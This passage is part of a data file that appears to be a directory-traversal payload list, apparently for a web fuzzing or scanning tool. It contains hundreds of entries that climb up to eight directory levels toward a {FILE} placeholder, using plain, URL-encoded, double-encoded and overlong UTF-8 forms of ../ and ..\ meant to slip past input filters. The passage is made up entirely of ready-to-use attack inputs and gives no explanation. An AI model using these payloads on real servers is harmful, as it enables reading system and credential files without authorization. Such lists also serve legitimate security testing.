"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,..%%32%66{FILE}",
"true,..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,..%%35%63{FILE}",
"true,..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
